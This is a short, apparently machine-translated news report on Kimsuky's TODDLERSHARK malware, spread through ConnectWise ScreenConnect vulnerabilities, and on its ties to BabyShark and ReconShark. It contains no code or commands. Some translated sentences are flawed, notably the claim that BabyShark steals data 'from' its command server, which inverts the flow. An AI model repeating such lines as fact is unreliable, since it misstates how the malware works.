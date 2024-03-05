Some hackers from North Korea have exploited the recently disclosed security vulnerabilities in ConnectWise ScreenConnect to distribute a new malware called TODDLERSHARK.

According to a report shared by Kroll, TODDLERSHARK has overlaps with well-known Kimsuky malware such as BabyShark and ReconShark.

What is known about the malware named TODDLERSHARK

“The cybercriminal gained access to the victim's workstation by exploiting the exposed configuration of the ScreenConnect application,” said security researchers Keith Wojcieszek, George Glass and Dave Truman. “They then exploited their 'hands on keyboard' access to use cmd.exe to execute mshta.exe with a URL to the Visual Basic (VB)-based malware.”

The ConnectWise vulnerabilities in question are CVE-2024-1708 and CVE-2024-1709emerged last month and have been heavily exploited by various cyber criminals to deliver cryptocurrency miners, ransomware, remote access trojans and malware that serve to steal information.



Kimsuky, also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), KTA082, Nickel Kimball and Velvet Chollima, has constantly expanded its malware arsenal to include new toolsthe last of which is GoBear and Troll Stealer.

BabyShark, discovery for the first time in late 2018, it is launched using an HTML Application (HTA) file; once started, The malware written in VB script language steals system information from a command and control (C2) server, maintains persistence on the system, and waits for further instructions from the operator.

Then, in May 2023, a variant of BabyShark called ReconShark was delivered to specifically targeted individuals through spear-phishing emails; TODDLERSHARK is rated as the latest evolution of the same malware due to similarities in code and behavior.

The malware, in addition to using a series of scheduled tasks for relative persistence, is also designed to capture and exfiltrate sensitive information on compromised systemsthus acting as a valuable reconnaissance tool.

TODDLERSHARK “shows elements of polymorphic behavior in the form of variable identity strings in the code, changing the position of the code via generated junk code and using uniquely generated C2 URLs, which may make this malware difficult to detect in some environments“said the researchers.

The development comes as South Korea's National Intelligence Services (NIS) accuse their northern counterpart of allegedly compromising the servers of two national semiconductor manufacturers (not named) and stole valuable data.

The digital intrusions occurred in December 2023 and February 2024; It would appear that cybercriminals targeted vulnerable Internet-exposed servers to gain initial accesssubsequently exploiting “living-off-the-land” (LotL) techniques rather than depositing malware to avoid better detection.

“North Korea may have begun preparations for its own semiconductor production due to difficulties in acquiring semiconductors due to sanctions against North Korea and increased demand linked to the development of weapons such as satellite missiles“, has declared the NIS.

Cases similar to TODDLERSHARK and some considerations

Similar cases of cyber threats with exploits of vulnerabilities in remote connection software have emerged in different global contexts; these incidents highlight the importance of cybersecurity and the need for continued vigilance in digital infrastructures; note that one of these similar cases always concerns Cyber ​​criminals from North Korea who exploited log4j.

The international community, together with companies and government bodies, is called upon to collaborate to develop and implement robust cyber defense measures in order to mitigate the risk of advanced cyber attacks, therefore the sharing of information and the adoption of best practices are essential (to protect yourself from “attacks” which are often more than bait, like the sameTODDLERSHARK) to address growing threats in the increasingly complex and interconnected digital landscape.